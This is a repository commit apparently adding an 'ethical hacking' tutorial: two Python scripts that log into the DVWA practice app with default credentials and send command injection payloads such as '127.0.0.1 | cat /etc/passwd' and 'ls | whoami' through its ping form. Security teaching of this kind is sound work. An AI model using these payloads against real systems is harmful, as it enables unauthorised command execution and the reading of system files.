add exploit command injection vulnerabilities tutorial

Author: x4nth055

Diff for: README.md

@@ -65,6 +65,7 @@ This is a repository of all the tutorials of [The Python Code](https://www.thepy
     - [How to Remove Metadata from PDFs in Python](https://thepythoncode.com/article/how-to-remove-metadata-from-pdfs-in-python). ([code](ethical-hacking/pdf-metadata-remover))
     - [How to Extract Metadata from Docx Files in Python](https://thepythoncode.com/article/docx-metadata-extractor-in-python). ([code](ethical-hacking/docx-metadata-extractor))
     - [How to Build Spyware in Python](https://thepythoncode.com/article/how-to-build-spyware-in-python). ([code](ethical-hacking/spyware))
+    - [How to Exploit Command Injection Vulnerabilities in Python](https://thepythoncode.com/article/how-to-exploit-command-injection-vulnerabilities-in-python). ([code](ethical-hacking/exploit-command-injection))
 
 - ### [Machine Learning](https://www.thepythoncode.com/topic/machine-learning)
     - ### [Natural Language Processing](https://www.thepythoncode.com/topic/nlp)

Diff for: ethical-hacking/exploit-command-injection/README.md

@@ -0,0 +1 @@
+# [How to Exploit Command Injection Vulnerabilities in Python](https://thepythoncode.com/article/how-to-exploit-command-injection-vulnerabilities-in-python)

Diff for: ethical-hacking/exploit-command-injection/command_injection_scanner.py

@@ -0,0 +1,58 @@
+# Import the necessary libraries.
+import requests
+from urllib.parse import urljoin
+
+# Define the target URL and login credentials.
+target_url = "http://192.168.134.129/dvwa/"
+login_url = urljoin(target_url, "login.php")
+login_data = {
+    "username": "admin",
+    "password": "password",
+    "Login": "Login"
+}
+
+# Define the vulnerable page URL.
+vuln_page_url = urljoin(target_url, "vulnerabilities/exec/")
+
+# Define the test payload.
+payload = "127.0.0.1 | cat /etc/passwd"
+
+
+def check_command_injection(base_url, login_url, login_data, vuln_page_url):
+    print(f"[!] Checking for command injection vulnerabilities at {vuln_page_url}")
+
+    # Authenticate with the application (DVWA).
+    session = requests.Session()
+    response = session.post(login_url, data=login_data)
+
+    if "Login failed" in response.text:
+        print("[-] Authentication failed. Please check the credentials.")
+        return
+
+    # Send the payload through the form.
+    form_data = {
+        "ip": payload,
+        "submit": "Submit"
+    }
+
+    try:
+        response = session.post(vuln_page_url, data=form_data)
+        print(f"[!] Payload used: {payload}")
+        print("[+] Response after command injection:\n")
+        print("=" * 80)
+        print(response.text)
+        print("=" * 80)
+        print("\n[!] Please inspect the response to determine if the parameter is vulnerable to command injection.\n")
+
+        # Write the response to a text file.
+        with open("response.txt", "w") as f:
+            f.write(response.text)
+        print("[+] Response written to response.txt")
+    except Exception as e:
+        print(f"[-] Error occurred while testing payload '{payload}': {e}")
+
+    print("[+] Command injection testing completed.\n")
+
+
+# Call the function with the required parameters.
+check_command_injection(target_url, login_url, login_data, vuln_page_url)

Diff for: ethical-hacking/exploit-command-injection/command_injection_scanner_auto.py

@@ -0,0 +1,75 @@
+# Import the necessary libraries.
+import requests
+from urllib.parse import urljoin
+from colorama import Fore, Style, init
+
+# Initialise colorama.
+init()
+
+
+# Define the target URL and login credentials.
+target_url = "http://192.168.134.129/dvwa/"
+login_url = urljoin(target_url, "login.php")
+login_data = {
+    "username": "admin",
+    "password": "password",
+    "Login": "Login"
+}
+
+# Define the vulnerable page URL.
+vuln_page_url = urljoin(target_url, "vulnerabilities/exec/")
+
+# Define the test payloads.
+payloads = [
+    "ls | whoami",
+    "127.0.0.1 | cat /etc/passwd",
+    "127.0.0.1 | ls -la"
+]
+
+def check_command_injection(base_url, login_url, login_data, vuln_page_url, payloads):
+    print(f"[!] Checking for command injection vulnerabilities at {vuln_page_url}")
+
+    # Authenticate with the application.
+    session = requests.Session()
+    response = session.post(login_url, data=login_data)
+
+    if "Login failed" in response.text:
+        print("[-] Authentication failed. Please check the credentials.")
+        return
+
+    responses = ""
+
+    for payload in payloads:
+        # Send the payload through the form.
+        form_data = {
+            "ip": payload,
+            "submit": "Submit"
+        }
+
+        try:
+            response = session.post(vuln_page_url, data=form_data)
+            print(f"{Fore.GREEN}[!] Payload used: {payload}{Style.RESET_ALL}")
+            print("[+] Response after command injection:\n")
+            print("=" * 80)
+            print(response.text)
+            print("=" * 80)
+            print(f"\n{Fore.YELLOW}[!] Please manually inspect the response to determine if the parameter is vulnerable to command injection.{Style.RESET_ALL}\n")
+
+            responses += f"[!] Payload used: {payload}\n"
+            responses += "[+] Response after command injection:\n"
+            responses += "=" * 80 + "\n"
+            responses += response.text
+            responses += "=" * 80 + "\n\n"
+        except Exception as e:
+            print(f"{Fore.RED}[-] Error occurred while testing payload '{payload}': {e}{Style.RESET_ALL}")
+            responses += f"[-] Error occurred while testing payload '{payload}': {e}\n"
+
+    # Write the responses to a text file.
+    with open("multiple_payload_response.txt", "w") as f:
+        f.write(responses)
+    print("[+] Responses written to response.txt")
+
+    print("[+] Command injection testing completed.\n")
+
+# Call the function with the required parameters.
+check_command_injection(target_url, login_url, login_data, vuln_page_url, payloads)